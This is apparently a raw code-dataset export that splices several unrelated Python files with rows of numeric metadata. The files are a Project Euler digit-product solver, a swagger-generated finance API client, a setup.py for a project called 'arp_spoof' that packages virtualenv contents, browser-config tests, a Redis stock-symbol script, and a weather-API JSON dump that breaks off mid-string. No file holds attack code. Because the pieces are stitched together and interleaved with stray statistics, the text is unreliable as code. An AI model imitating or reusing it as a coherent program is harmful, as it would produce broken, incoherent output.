num = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
def main():
    """Compute and print the problem-8 result."""
    print(LargeProductInSeries())
def LargeProductInSeries(digits=None, window=5):
    """Return the greatest product of `window` adjacent digits in `digits`.

    Args:
        digits: string of decimal digits; defaults to the module-level
            1000-digit constant `num`.
        window: number of adjacent digits per product (default 5, as in
            the original hard-coded implementation).

    Returns:
        The maximum window product as an int (0 when `digits` is shorter
        than `window`).

    Bug fixed: the original returned the entire sorted list of window
    products; Project Euler problem 8 asks for the greatest product, so
    the maximum is returned instead.
    """
    if digits is None:
        digits = num  # fall back to the module-level series
    best = 0
    for start in range(len(digits) - window + 1):
        product = 1
        for ch in digits[start:start + window]:
            product *= int(ch)
        if product > best:
            best = product
    return best
def ProductDigits(n):
    """Return the product of all decimal digits in the string `n`.

    Generalized from the original, which multiplied exactly the first
    five characters (n[0]..n[4]) and failed on shorter input; this works
    for any length (an empty string yields 1, the empty product).
    """
    product = 1
    for ch in n:
        product *= int(ch)
    return product
# Script entry point: run only when executed directly, not on import.
if __name__ == '__main__':
    main()
| 69.4
| 1,009
| 0.880403
| 56
| 1,388
| 21.678571
| 0.553571
| 0.016474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.779151
| 0.067003
| 1,388
| 19
| 1,010
| 73.052632
| 0.158301
| 0.018732
| 0
| 0
| 0
| 0
| 0.751678
| 0.745712
| 0
| 1
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0
| 0.076923
| 0.384615
| 0.076923
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4df5f00e2e198ea2cf9ddb64ae1d35f5fb3d911b
| 32
|
py
|
Python
|
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f():
    # Returns the fixed value 42.
    return 42

100  # bare literal expression — presumably REPL echo test data; confirm against the REPL tests
| 6.4
| 14
| 0.46875
| 5
| 32
| 3
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.277778
| 0.4375
| 32
| 4
| 15
| 8
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
129927284737b6a797a0fb94493c93c97da6daa9
| 13,892
|
py
|
Python
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Proton API
Financial engineering module of Hydrogen Atom # noqa: E501
OpenAPI spec version: 1.9.2
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from proton_api.api_client import ApiClient
class UtilApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Fall back to a default-configured client when none is supplied.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def decision_tree_result(self, decision_tree_result_request, **kwargs):  # noqa: E501
        """Decision Tree Result  # noqa: E501

        Traverse a decision tree and find the resulting leaf node  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.decision_tree_result(decision_tree_result_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param DecisionTreeResultRequest decision_tree_result_request: Request payload for Decision Tree Result (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: always ask the *_with_http_info variant for data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            # Async: return the thread; caller retrieves the result via .get().
            return self.decision_tree_result_with_http_info(decision_tree_result_request, **kwargs)  # noqa: E501
        else:
            (data) = self.decision_tree_result_with_http_info(decision_tree_result_request, **kwargs)  # noqa: E501
            return data

    def decision_tree_result_with_http_info(self, decision_tree_result_request, **kwargs):  # noqa: E501
        """Decision Tree Result  # noqa: E501

        Traverse a decision tree and find the resulting leaf node  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.decision_tree_result_with_http_info(decision_tree_result_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param DecisionTreeResultRequest decision_tree_result_request: Request payload for Decision Tree Result (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['decision_tree_result_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any kwarg not in the whitelist.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method decision_tree_result" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'decision_tree_result_request' is set
        if self.api_client.client_side_validation and ('decision_tree_result_request' not in params or
                                                       params['decision_tree_result_request'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `decision_tree_result_request` when calling `decision_tree_result`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The request payload is sent as the HTTP body.
        body_params = None
        if 'decision_tree_result_request' in params:
            body_params = params['decision_tree_result_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/decision_tree_result', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def order_rebalance(self, order_rebalance_request, **kwargs):  # noqa: E501
        """Order Rebalance  # noqa: E501

        Create orders to rebalance client accounts or portfolios  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.order_rebalance(order_rebalance_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param OrderRebalanceRequest order_rebalance_request: Request payload for Order Rebalance (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: always ask the *_with_http_info variant for data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.order_rebalance_with_http_info(order_rebalance_request, **kwargs)  # noqa: E501
        else:
            (data) = self.order_rebalance_with_http_info(order_rebalance_request, **kwargs)  # noqa: E501
            return data

    def order_rebalance_with_http_info(self, order_rebalance_request, **kwargs):  # noqa: E501
        """Order Rebalance  # noqa: E501

        Create orders to rebalance client accounts or portfolios  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.order_rebalance_with_http_info(order_rebalance_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param OrderRebalanceRequest order_rebalance_request: Request payload for Order Rebalance (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['order_rebalance_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any kwarg not in the whitelist.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method order_rebalance" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'order_rebalance_request' is set
        if self.api_client.client_side_validation and ('order_rebalance_request' not in params or
                                                       params['order_rebalance_request'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `order_rebalance_request` when calling `order_rebalance`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The request payload is sent as the HTTP body.
        body_params = None
        if 'order_rebalance_request' in params:
            body_params = params['order_rebalance_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/order_rebalance', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def performance_calculator(self, performance_calculator_request, **kwargs):  # noqa: E501
        """Performance Calculator  # noqa: E501

        Calculate performance/risk metrics for a Nucleus entity  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.performance_calculator(performance_calculator_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param PerformanceCalculatorRequest performance_calculator_request: Request payload for Performance Calculator (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: always ask the *_with_http_info variant for data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.performance_calculator_with_http_info(performance_calculator_request, **kwargs)  # noqa: E501
        else:
            (data) = self.performance_calculator_with_http_info(performance_calculator_request, **kwargs)  # noqa: E501
            return data

    def performance_calculator_with_http_info(self, performance_calculator_request, **kwargs):  # noqa: E501
        """Performance Calculator  # noqa: E501

        Calculate performance/risk metrics for a Nucleus entity  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.performance_calculator_with_http_info(performance_calculator_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param PerformanceCalculatorRequest performance_calculator_request: Request payload for Performance Calculator (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['performance_calculator_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any kwarg not in the whitelist.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method performance_calculator" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'performance_calculator_request' is set
        if self.api_client.client_side_validation and ('performance_calculator_request' not in params or
                                                       params['performance_calculator_request'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `performance_calculator_request` when calling `performance_calculator`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The request payload is sent as the HTTP body.
        body_params = None
        if 'performance_calculator_request' in params:
            body_params = params['performance_calculator_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/performance_calculator', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 41.843373
| 147
| 0.641232
| 1,552
| 13,892
| 5.458763
| 0.112758
| 0.04627
| 0.05949
| 0.044263
| 0.894122
| 0.878659
| 0.845019
| 0.823536
| 0.820703
| 0.820703
| 0
| 0.015854
| 0.278074
| 13,892
| 331
| 148
| 41.969789
| 0.828896
| 0.345595
| 0
| 0.719298
| 1
| 0
| 0.201044
| 0.095125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040936
| false
| 0
| 0.023392
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
423f317c9fd6c56f2dc721d8472f1c91421c84e9
| 6,145
|
py
|
Python
|
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
# Packaging script for the `arp_spoof` ARP-spoofing tool.
#
# NOTE(review): the `packages` list below enumerates the contents of the
# project's *virtualenv* (pip, scapy, an old pip egg, ...) rather than the
# project's own package(s). Shipping a venv is almost certainly unintended —
# confirm and replace with the actual project packages (e.g. via
# setuptools.find_packages with an `exclude=['venv*']` filter).
from setuptools import setup
setup(
    name='arp_spoof',
    version='',  # NOTE(review): empty version string — should be a real release version
    packages=['venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor',
              'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pep517',
              'venv.Lib.site-packages.pip._vendor.pytoml', 'venv.Lib.site-packages.pip._vendor.certifi',
              'venv.Lib.site-packages.pip._vendor.chardet', 'venv.Lib.site-packages.pip._vendor.chardet.cli',
              'venv.Lib.site-packages.pip._vendor.distlib', 'venv.Lib.site-packages.pip._vendor.distlib._backport',
              'venv.Lib.site-packages.pip._vendor.msgpack', 'venv.Lib.site-packages.pip._vendor.urllib3',
              'venv.Lib.site-packages.pip._vendor.urllib3.util', 'venv.Lib.site-packages.pip._vendor.urllib3.contrib',
              'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport',
              'venv.Lib.site-packages.pip._vendor.urllib3.packages',
              'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports',
              'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname',
              'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib',
              'venv.Lib.site-packages.pip._vendor.html5lib._trie',
              'venv.Lib.site-packages.pip._vendor.html5lib.filters',
              'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers',
              'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters',
              'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile',
              'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests',
              'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol',
              'venv.Lib.site-packages.pip._vendor.cachecontrol.caches',
              'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources',
              'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.cli',
              'venv.Lib.site-packages.pip._internal.req', 'venv.Lib.site-packages.pip._internal.vcs',
              'venv.Lib.site-packages.pip._internal.utils', 'venv.Lib.site-packages.pip._internal.models',
              'venv.Lib.site-packages.pip._internal.commands', 'venv.Lib.site-packages.pip._internal.operations',
              'venv.Lib.site-packages.scapy', 'venv.Lib.site-packages.scapy.arch',
              'venv.Lib.site-packages.scapy.arch.bpf', 'venv.Lib.site-packages.scapy.arch.windows',
              'venv.Lib.site-packages.scapy.asn1', 'venv.Lib.site-packages.scapy.tools',
              'venv.Lib.site-packages.scapy.layers', 'venv.Lib.site-packages.scapy.layers.tls',
              'venv.Lib.site-packages.scapy.layers.tls.crypto', 'venv.Lib.site-packages.scapy.contrib',
              'venv.Lib.site-packages.scapy.contrib.automotive', 'venv.Lib.site-packages.scapy.contrib.automotive.gm',
              'venv.Lib.site-packages.scapy.contrib.automotive.bmw', 'venv.Lib.site-packages.scapy.modules',
              'venv.Lib.site-packages.scapy.modules.krack', 'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.req',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.vcs',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.utils',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.compat',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.models',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.distlib',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.distlib._backport',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.colorama',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib._trie',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.filters',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treewalkers',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treeadapters',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treebuilders',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.lockfile',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.progress',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.chardet',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.util',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.contrib',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.packages',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.packaging',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.cachecontrol',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.cachecontrol.caches',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.webencodings',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.pkg_resources',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.commands',
              'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.operations'],
    url='',       # NOTE(review): metadata fields below are unfilled — populate before publishing
    license='',
    author='SebastianOhm',
    author_email='',
    description=''
)
| 79.805195
| 125
| 0.65533
| 900
| 6,145
| 4.387778
| 0.09
| 0.157761
| 0.247911
| 0.42821
| 0.945809
| 0.927577
| 0.767283
| 0.667511
| 0.524183
| 0.413016
| 0
| 0.03774
| 0.167779
| 6,145
| 76
| 126
| 80.855263
| 0.734454
| 0
| 0
| 0
| 0
| 0.44
| 0.769243
| 0.765826
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.013333
| 0
| 0.013333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
429a3b81ed60f1fcd5cd0c4d4064e8461124607d
| 1,799
|
py
|
Python
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 169
|
2020-03-16T15:04:42.000Z
|
2022-03-31T18:53:41.000Z
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 163
|
2020-03-15T06:33:54.000Z
|
2022-03-31T21:37:09.000Z
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 26
|
2020-03-28T05:43:22.000Z
|
2022-02-11T16:46:34.000Z
|
def test_py_config_defaults(py_config):
# driver settings
assert py_config.driver.browser == 'chrome'
assert py_config.driver.remote_url == ''
assert py_config.driver.wait_time == 10
assert py_config.driver.page_load_wait_time == 0
assert py_config.driver.options == []
assert py_config.driver.version == 'latest'
assert py_config.driver.capabilities == {}
assert py_config.driver.experimental_options is None
assert py_config.driver.webdriver_kwargs == {}
# logging settings
assert py_config.logging.screenshots_on is True
assert py_config.logging.pylog_level == 'info'
# viewport settings
assert py_config.viewport.maximize is True
assert py_config.viewport.width == 1440
assert py_config.viewport.height == 900
assert py_config.viewport.orientation == 'portrait'
# custom settings
assert py_config.custom is not None
def test_py_config(py_config):
# driver settings
assert py_config.driver.browser == 'chrome'
assert py_config.driver.remote_url == ''
assert py_config.driver.wait_time == 10
assert py_config.driver.page_load_wait_time == 0
assert py_config.driver.options == []
assert py_config.driver.version == 'latest'
assert py_config.driver.capabilities == {}
assert py_config.driver.experimental_options is None
assert py_config.driver.webdriver_kwargs == {}
# logging settings
assert py_config.logging.screenshots_on is True
assert py_config.logging.pylog_level == 'info'
# viewport settings
assert py_config.viewport.maximize is True
assert py_config.viewport.width == 1440
assert py_config.viewport.height == 900
assert py_config.viewport.orientation == 'portrait'
# custom settings
assert py_config.custom is not None
| 35.27451
| 56
| 0.732073
| 239
| 1,799
| 5.271967
| 0.1841
| 0.228571
| 0.355556
| 0.285714
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0
| 0.013578
| 0.181212
| 1,799
| 50
| 57
| 35.98
| 0.841819
| 0.07393
| 0
| 0.941176
| 0
| 0
| 0.028968
| 0
| 0
| 0
| 0
| 0
| 0.941176
| 1
| 0.058824
| false
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
35f73226aa4aab7f82708c63714d8ee4fee7b105
| 1,125
|
py
|
Python
|
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | null | null | null |
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | 3
|
2020-12-11T19:12:19.000Z
|
2021-05-21T01:26:57.000Z
|
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | 14
|
2020-06-17T15:23:36.000Z
|
2022-01-03T03:04:16.000Z
|
import os
import symboltable
import util
def sdy_sp500():
    """Print which SDY symbols are (and are not) in the S&P 500 Redis set."""
    sdy = util.redis_set_to_python_set("symbol-set-sdy")
    sp500 = util.redis_set_to_python_set("symbol-set-sp500")

    in_sp500 = sdy & sp500
    print("\nThese symbols are in the sp500")
    print(in_sp500)
    print(len(in_sp500))

    not_in_sp500 = sdy - in_sp500
    print("\nThese symbols are not in the sp500")
    print(not_in_sp500)
    print(len(not_in_sp500))

    print("\nThe total number of symbols in both sets")
    print(len(sdy))
def aristocrats_sdy():
    """Print which dividend-aristocrat symbols are (and are not) in the SDY Redis set."""
    aristocrats = util.redis_set_to_python_set("symbol-set-aristocrats")
    sdy = util.redis_set_to_python_set("symbol-set-sdy")

    in_sdy = aristocrats & sdy
    print("\nThese symbols are in the sdy")
    print(in_sdy)
    print(len(in_sdy))

    not_in_sdy = aristocrats - in_sdy
    print("\nThese symbols are not in the sdy")
    print(not_in_sdy)
    print(len(not_in_sdy))

    print("\nThe total number of symbols in both sets")
    print(len(aristocrats))
if __name__ == "__main__":
    # sdy_sp500() is the alternate report; only the aristocrats/SDY
    # comparison runs by default.
    aristocrats_sdy()
| 26.162791
| 65
| 0.704889
| 149
| 1,125
| 5.134228
| 0.228188
| 0.062745
| 0.062745
| 0.073203
| 0.833987
| 0.833987
| 0.833987
| 0.833987
| 0.833987
| 0.637909
| 0
| 0.02938
| 0.183111
| 1,125
| 42
| 66
| 26.785714
| 0.803047
| 0.009778
| 0
| 0.516129
| 0
| 0
| 0.260557
| 0.019766
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.096774
| 0
| 0.16129
| 0.516129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c400bbe4af2ce277ad8f4a1c89f363cb886e1bdc
| 2,437
|
py
|
Python
|
tests/unit/pollutionapi30/json_test_dumps.py
|
ChuckVanHoff/pyowm
|
86735d8629ead2cfa0232b0f8ec0b88ab16eff11
|
[
"MIT"
] | 1
|
2019-06-01T07:47:12.000Z
|
2019-06-01T07:47:12.000Z
|
tests/unit/pollutionapi30/json_test_dumps.py
|
cjsgh901/pyowm
|
cdd59eb72f32f7238624ceef9b2e2329a5ebd472
|
[
"MIT"
] | null | null | null |
tests/unit/pollutionapi30/json_test_dumps.py
|
cjsgh901/pyowm
|
cdd59eb72f32f7238624ceef9b2e2329a5ebd472
|
[
"MIT"
] | 1
|
2020-01-20T22:54:02.000Z
|
2020-01-20T22:54:02.000Z
|
"""
JSON test OWM API responses
"""
COINDEX_JSON_DUMP = '{"reference_time": 1234567, "co_samples": [{"pressure": ' \
'1000, "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 681.2920532226562, ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 464.15887451171875, ' \
